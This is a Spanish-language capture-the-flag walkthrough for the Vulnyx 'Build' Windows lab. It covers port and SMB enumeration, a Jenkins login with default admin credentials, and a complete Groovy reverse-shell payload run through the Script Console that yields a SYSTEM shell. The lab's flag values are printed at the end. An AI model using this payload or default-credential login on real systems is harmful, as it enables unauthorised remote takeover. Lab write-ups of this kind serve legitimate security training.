Build Vulnyx (Very Easy- Windows)
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>
nmap -sCV -p<PORTS> <IP>
Info:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-28 03:31 EDT
Nmap scan report for 192.168.5.67
Host is up (0.0060s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp open msrpc?
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
8080/tcp open http Jetty 12.0.19
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Starting Jenkins
|_http-server-header: Jetty(12.0.19)
49664/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:F4:A6:7F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: BUILD, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:f4:a6:7f (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
|_clock-skew: 8h59m56s
| smb2-time:
| date: 2025-07-28T16:33:52
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.60 seconds
Veremos varias cosas interesantes, entre ellas una pagina en el puerto 80
por defecto del IIS
y en el puerto 8080
veremos un jenkins
con autenticacion, pero tambien veremos un SAMBA
por lo que tendremos bastantes vias en las que podamos enumerar.
Para poder obtener un poco de informacion basica.
netexec smb <IP>
Info:
SMB 192.168.5.67 445 BUILD [*] Windows 10 / Server 2019 Build 19041 x64 (name:BUILD) (domain:BUILD) (signing:False) (SMBv1:False)
Veremos que no nos da gran informacion, por lo que vamos a enumerar el SAMBA
directamente a ver que nos encontramos, pero nos pondra que tendremos el acceso denegado, por lo que vamos a seguir enumerando.
smbmap --no-banner -H <IP> -u '' -p ''
Info:
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[*] Closed 1 connections
Nos ha detectado un host
el cual ya sabemos que esta ahi, pero no veremos gran cosa, por lo que vamos a seguir enumerando de otra forma.
Si nos vamos a donde tenemos el jenkins
y probamos credenciales por defecto a ver si cuela, veremos que si funcionan estas.
User: admin
Pass: admin
Veremos que estaremos dentro, al ser Jenkins
podremos probar la parte donde se pueden ejecutar comandos scripts
a nivel de sistema, a ver si podemos, ya que hemos entrado como administrador
.
No iremos a Manage Jenkins
-> Script Console
, dentro de este veremos un campo de texto en el que pondremos lo siguiente:
Thread.start {
String host="<IP>";
int port=<PORT>;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
}
Antes de enviar esto nos pondremos a la escucha:
nc -lvnp <PORT>
Ahora si volvemos a la pagina, le damos a Run
y volvemos a donde tenemos la escucha veremos lo siguiente:
listening on [any] 7777 ...
connect to [192.168.5.50] from (UNKNOWN) [192.168.5.67] 56548
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\Jenkins>whoami
whoami
nt authority\system
Vemos que se estaba ejecutando como administrador
por lo que hemos obtenido una shell
directamente como nt authority\system
, con esto habremos terminado la maquina, vamos a leer las flags
de usuario
y root
.
user.txt
17a6390c294493b8fc423154791cdd0b
root.txt
927c9a24e72f5d76ffd8bc9c2477d10f
Last updated